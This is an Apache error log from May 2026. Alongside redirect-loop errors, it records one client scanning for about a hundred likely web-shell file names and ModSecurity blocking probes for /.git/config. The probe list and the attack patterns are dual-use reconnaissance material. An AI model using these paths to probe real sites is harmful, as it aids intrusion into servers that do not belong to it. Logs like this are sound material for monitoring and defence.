[Tue May 12 01:11:53.690523 2026] [core:error] [pid 1707624:tid 1707690] [client 4.193.137.131:1117] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:53.690555 2026] [core:error] [pid 1707624:tid 1707690] [client 4.193.137.131:1117] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:54.222704 2026] [core:error] [pid 1695975:tid 1695996] [client 4.193.137.131:1124] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:54.222732 2026] [core:error] [pid 1695975:tid 1695996] [client 4.193.137.131:1124] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:54.704530 2026] [core:error] [pid 1630927:tid 1630952] [client 4.193.137.131:1114] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:54.704558 2026] [core:error] [pid 1630927:tid 1630952] [client 4.193.137.131:1114] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:55.233993 2026] [core:error] [pid 1695975:tid 1695997] [client 4.193.137.131:1104] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:55.234054 2026] [core:error] [pid 1695975:tid 1695997] [client 4.193.137.131:1104] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:55.709322 2026] [core:error] [pid 1630927:tid 1630945] [client 4.193.137.131:1115] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:55.709348 2026] [core:error] [pid 1630927:tid 1630945] [client 4.193.137.131:1115] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:56.219338 2026] [core:error] [pid 1691274:tid 1691281] [client 4.193.137.131:1108] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:56.219360 2026] [core:error] [pid 1691274:tid 1691281] [client 4.193.137.131:1108] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:56.750699 2026] [core:error] [pid 1630927:tid 1630930] [client 4.193.137.131:1119] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:56.750722 2026] [core:error] [pid 1630927:tid 1630930] [client 4.193.137.131:1119] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:57.268473 2026] [core:error] [pid 1695975:tid 1695992] [client 4.193.137.131:1349] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:57.268501 2026] [core:error] [pid 1695975:tid 1695992] [client 4.193.137.131:1349] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:57.761373 2026] [core:error] [pid 1630927:tid 1630943] [client 4.193.137.131:1246] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:57.761405 2026] [core:error] [pid 1630927:tid 1630943] [client 4.193.137.131:1246] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:58.289072 2026] [core:error] [pid 1695975:tid 1695981] [client 4.193.137.131:1122] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:58.289121 2026] [core:error] [pid 1695975:tid 1695981] [client 4.193.137.131:1122] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:58.810086 2026] [core:error] [pid 1707624:tid 1707683] [client 4.193.137.131:1106] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:58.810113 2026] [core:error] [pid 1707624:tid 1707683] [client 4.193.137.131:1106] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:59.325487 2026] [core:error] [pid 1709071:tid 1709090] [client 4.193.137.131:1102] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:59.325524 2026] [core:error] [pid 1709071:tid 1709090] [client 4.193.137.131:1102] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:59.870195 2026] [core:error] [pid 1691274:tid 1691288] [client 4.193.137.131:1397] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:59.870221 2026] [core:error] [pid 1691274:tid 1691288] [client 4.193.137.131:1397] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:12:00.362399 2026] [core:error] [pid 1695975:tid 1695988] [client 4.193.137.131:1358] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:12:00.362436 2026] [core:error] [pid 1695975:tid 1695988] [client 4.193.137.131:1358] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:12:00.871201 2026] [core:error] [pid 1630927:tid 1630953] [client 4.193.137.131:1355] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:12:00.871237 2026] [core:error] [pid 1630927:tid 1630953] [client 4.193.137.131:1355] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:12:01.422420 2026] [core:error] [pid 1630927:tid 1630938] [client 4.193.137.131:1090] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:12:01.422463 2026] [core:error] [pid 1630927:tid 1630938] [client 4.193.137.131:1090] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:12:01.920219 2026] [core:error] [pid 1709071:tid 1709089] [client 4.193.137.131:1100] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:12:01.920250 2026] [core:error] [pid 1709071:tid 1709089] [client 4.193.137.131:1100] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:12:02.404611 2026] [core:error] [pid 1630927:tid 1630946] [client 4.193.137.131:1364] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:12:02.404668 2026] [core:error] [pid 1630927:tid 1630946] [client 4.193.137.131:1364] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:12:02.880533 2026] [core:error] [pid 1695975:tid 1696002] [client 4.193.137.131:1755] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:12:02.880562 2026] [core:error] [pid 1695975:tid 1696002] [client 4.193.137.131:1755] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:12:03.378060 2026] [core:error] [pid 1630927:tid 1630939] [client 4.193.137.131:1116] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:12:03.378090 2026] [core:error] [pid 1630927:tid 1630939] [client 4.193.137.131:1116] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:13:05.720958 2026] [authz_core:error] [pid 1691274:tid 1691279] [client 40.77.167.151:6853] AH01630: client denied by server configuration: /home/labaujue/public_html/wp-includes/block-supports/error_log
[Tue May 12 01:13:06.336687 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/file60.php
[Tue May 12 01:13:06.470544 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/wp-k7djufwez2.php
[Tue May 12 01:13:06.597429 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/bc.php
[Tue May 12 01:13:06.821824 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/100.php
[Tue May 12 01:13:06.945654 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/xmu.php
[Tue May 12 01:13:07.060330 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/bob.php
[Tue May 12 01:13:07.180878 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/av.php
[Tue May 12 01:13:07.296299 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/casp1.php
[Tue May 12 01:13:07.411965 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/file6.php
[Tue May 12 01:13:07.533027 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/xs.php
[Tue May 12 01:13:07.648019 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/xxa.php
[Tue May 12 01:13:07.766687 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/3369.php
[Tue May 12 01:13:07.946845 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/dostshell.php
[Tue May 12 01:13:08.073117 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/zoper1.php
[Tue May 12 01:13:08.187793 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/77.php
[Tue May 12 01:13:08.302124 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/wp-kz.php
[Tue May 12 01:13:08.416837 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/file6.php
[Tue May 12 01:13:08.531400 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/zogy1.php
[Tue May 12 01:13:08.655213 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/19.php
[Tue May 12 01:13:08.770343 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/11.php
[Tue May 12 01:13:08.885639 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/w.php
[Tue May 12 01:13:09.008554 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/7.php
[Tue May 12 01:13:09.140685 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/ortasekerli1.php
[Tue May 12 01:13:09.260335 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/xxx.php
[Tue May 12 01:13:09.380234 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/cdxadmin.php
[Tue May 12 01:13:09.727259 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/gecko.php
[Tue May 12 01:13:09.841504 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/fone1.php
[Tue May 12 01:13:10.005672 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/cilus.php
[Tue May 12 01:13:10.130838 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/adminfuns.php
[Tue May 12 01:13:10.262413 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/tires.php
[Tue May 12 01:13:10.376941 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/wp-tiroto.php
[Tue May 12 01:13:10.496833 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/a7.php
[Tue May 12 01:13:10.617362 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/1.php
[Tue May 12 01:13:10.751654 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/drykl.php
[Tue May 12 01:13:11.066210 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/BDKR28WP.php
[Tue May 12 01:13:11.189816 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/mifta.php
[Tue May 12 01:13:11.324870 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/xwx1.php
[Tue May 12 01:13:11.499511 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/a1.php
[Tue May 12 01:13:11.757219 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/d.php
[Tue May 12 01:13:12.036572 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/edit.php
[Tue May 12 01:13:12.161969 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/xff.php
[Tue May 12 01:13:12.289138 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/bal.php
[Tue May 12 01:13:12.539347 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/xltt.php
[Tue May 12 01:13:12.670035 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/son.php
[Tue May 12 01:13:12.844185 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/doc.php
[Tue May 12 01:13:12.972166 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/zo.php
[Tue May 12 01:13:13.094421 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/xper1.php
[Tue May 12 01:13:13.444849 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/tiny.php
[Tue May 12 01:13:13.576710 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/bthil.php
[Tue May 12 01:13:13.778251 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/s1.php
[Tue May 12 01:13:13.892809 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/de.php
[Tue May 12 01:13:14.007711 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/axe.php
[Tue May 12 01:13:14.123811 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/roksad1.php
[Tue May 12 01:13:14.497019 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/aj11.php
[Tue May 12 01:13:14.627564 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/yuzuru1.php
[Tue May 12 01:13:14.751096 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/1a.php
[Tue May 12 01:13:14.878529 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/gelio1.php
[Tue May 12 01:13:15.142437 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/2.php
[Tue May 12 01:13:15.429956 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/sky.php
[Tue May 12 01:13:15.837521 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/man.php
[Tue May 12 01:13:15.952109 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/ws85.php
[Tue May 12 01:13:16.067081 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/Sanskrit.php
[Tue May 12 01:13:16.184873 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/ms-edit.php
[Tue May 12 01:13:16.299530 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/dass.php
[Tue May 12 01:13:16.413946 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/7.php
[Tue May 12 01:13:16.577152 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/cu.php
[Tue May 12 01:13:16.812032 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/ganja.php
[Tue May 12 01:13:17.022719 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/pp.php
[Tue May 12 01:13:17.137511 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/card.php
[Tue May 12 01:13:17.252417 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/packsin1.php
[Tue May 12 01:13:17.449075 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/wps.php
[Tue May 12 01:13:17.563953 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/wgift1.php
[Tue May 12 01:13:17.678720 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/mar.php
[Tue May 12 01:13:17.793653 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/img.php
[Tue May 12 01:13:17.912621 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/themes.php
[Tue May 12 01:13:18.029719 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/acp.php
[Tue May 12 01:13:18.145729 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/error_log.php
[Tue May 12 01:13:18.287474 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/zdd.php
[Tue May 12 01:13:18.402210 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/link.php
[Tue May 12 01:13:18.530886 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/sallu.php
[Tue May 12 01:13:18.701631 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/aboute.php
[Tue May 12 01:13:18.816257 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/ayk.php
[Tue May 12 01:13:18.949090 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/one.php
[Tue May 12 01:13:19.064789 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/press.php
[Tue May 12 01:13:19.181743 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/ng.php
[Tue May 12 01:13:19.299850 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/tx79.php
[Tue May 12 01:13:19.414578 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/wp-block.php
[Tue May 12 01:13:19.547438 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/8.php
[Tue May 12 01:13:19.844570 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/options.php
[Tue May 12 01:13:19.959882 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/admlo.php
[Tue May 12 01:13:20.074576 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/x=34.php
[Tue May 12 01:13:20.189340 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/tramuibs.php
[Tue May 12 01:13:20.308604 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/view.php
[Tue May 12 01:13:20.589893 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/aa.php
[Tue May 12 01:13:20.704836 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/x402.php
[Tue May 12 01:13:20.820476 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/lib.php
[Tue May 12 01:13:20.948448 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/ws78.php
[Tue May 12 01:13:21.078968 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/f5.php
[Tue May 12 01:13:21.194901 2026] [:error] [pid 1709071:tid 1709103] [client 172.212.136.43:5970] File does not exist: /home/nearoofr/public_html/alpha.php
[Tue May 12 01:13:29.350207 2026] [security2:error] [pid 1691274:tid 1691288] [client 172.94.9.253:59616] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.git/config"] [unique_id "agJimVfdQaraX_prmqcB1wAAAAs"]
[Tue May 12 01:13:29.350443 2026] [security2:error] [pid 1691274:tid 1691288] [client 172.94.9.253:59616] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.git/config"] [unique_id "agJimVfdQaraX_prmqcB1wAAAAs"]
[Tue May 12 01:13:30.444401 2026] [security2:error] [pid 1691274:tid 1691288] [client 172.94.9.253:59616] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agJimVfdQaraX_prmqcB1wAAAAs"]
[Tue May 12 01:13:30.545686 2026] [security2:error] [pid 1630927:tid 1630932] [client 172.94.9.253:59624] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.git/config"] [unique_id "agJimmiGYYhUwDaJINnJawAAAUI"], referer: https://tchatbooster.com/.git/config
